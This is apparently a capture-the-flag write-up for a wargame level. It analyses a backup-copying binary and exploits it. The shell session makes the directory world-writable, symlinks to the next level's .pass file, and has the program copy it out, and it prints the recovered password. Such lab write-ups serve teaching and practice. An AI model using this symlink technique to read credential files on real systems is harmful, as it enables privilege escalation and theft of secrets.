# Level 08

## First step - analysing  

Interesting functions.  

```bash
...
0x00000000004008c4  log_wrapper
0x00000000004009f0  main
...
```

By analysing the source code we can get a better understanding of the program. It takes a file as argument and copies its content byte by byte into a fresh new copy with the same name within the *backups* directory.  
It also fills a log file with hardcoded strings concatenated with the file name.  

## Second step - exploit

The exploit is straight forward, since we can read and get the content of any file we want, we can then make our program read the content of *.pass* file from level09.  

We just have to make sure to get the rights to create a new file in order to create a symbolic link pointing to "level09/.pass".  

```bash
$> $ ./level08 /home/users/level09/.pass
ERROR: Failed to open ./backups//home/users/level09/.pass
$> ./level08 level08
$> cat backups/level08
...
# By testing different options, we realized the program copies the content of the file passed as parameter (if we have the rights) in the "backups" directory
$> chmod 777 . # so we can create a file
$> ln -s /home/users/level09/.pass test # toto points to .pass
$> ./level08 test
$> cat backups/test
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
```
